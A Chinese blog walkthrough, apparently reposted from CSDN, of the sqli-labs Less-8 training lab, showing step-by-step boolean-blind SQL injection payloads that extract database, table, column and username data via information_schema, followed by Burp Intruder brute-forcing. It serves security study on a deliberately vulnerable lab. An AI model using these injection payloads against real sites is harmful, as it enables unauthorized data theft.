sqli-labs(less-8)

本文阅读 2 分钟
首页 安全分享,WEB安全 正文

目录

 less-8(布尔盲注)手工

1.判断闭合方式

2.判断数据库个数

3.判断第一个数据库字符长度

4.根据ascii码判断每个库名的具体字符

5.判断security库中表的个数

6.判断security库里第一个表名的长度

7.判断security库里第一个表的第一个字符的ascii值

8.判断security.users表的字段个数

9.判断security.users表的第一个字段的长度

10.判断security.users表的第一个字段的第一个字符的ascii值

11.判断security.users表有多少行数据

12.判断user表里的第一行username字段的数据长度

13.判断user表里的第一行username字段的第一个字符的ascii值

 less-8(布尔盲注)爆破

1.判断闭合方式

2.判断数据库个数

?id=1' and (select count (schema_name) from information_schema.schemata)=数据库个数(从1开始猜) -- -

img

3.判断第一个数据库字符长度

?id=1' and (select length(schema_name) from information_schema.schemata limit 0,1)=18 -- -

img

4.根据ascii码判断每个库名的具体字符

  ?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105 -- - #可以用>和<判断大概位置

img

5.判断security库中表的个数

?id=1' and (select count(table_name) from information_schema.tables where table_schema='security')=4-- - 

img

6.判断security库里第一个表名的长度

?id=1' and (select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)=6 -- -

img

7.判断security库里第一个表的第一个字符的ascii值

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 -- -

img

8.判断security.users表的字段个数

?id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3-- -

img

9.判断security.users表的第一个字段的长度

?id=1' and (select length(column_name) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)=2 -- -

img

10.判断security.users表的第一个字段的第一个字符的ascii值

?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105 -- -

img

11.判断security.users表有多少行数据

?id=1' and (select count(username) from security.users)=13 -- -

img

12.判断user表里的第一行username字段的数据长度

?id=1' and (select length(username) from security.users limit 0,1)=4 -- -

img

13.判断user表里的第一行username字段的第一个字符的ascii值

?id=1' and ascii(substr((select username from security.users limit 0,1),1,1))=68-- -

img

?id=1' and substr(database(),1,1)='s' -- -

拦截流量包,右击Send to intruder发送到intruder

img

点击clear

img

选中字母s,点击add

img

点击payloads

img

添加a-z,A-Z,0-9

img

开始爆破 

imgimg

爆破结果

img

爆破成功

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125751888
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复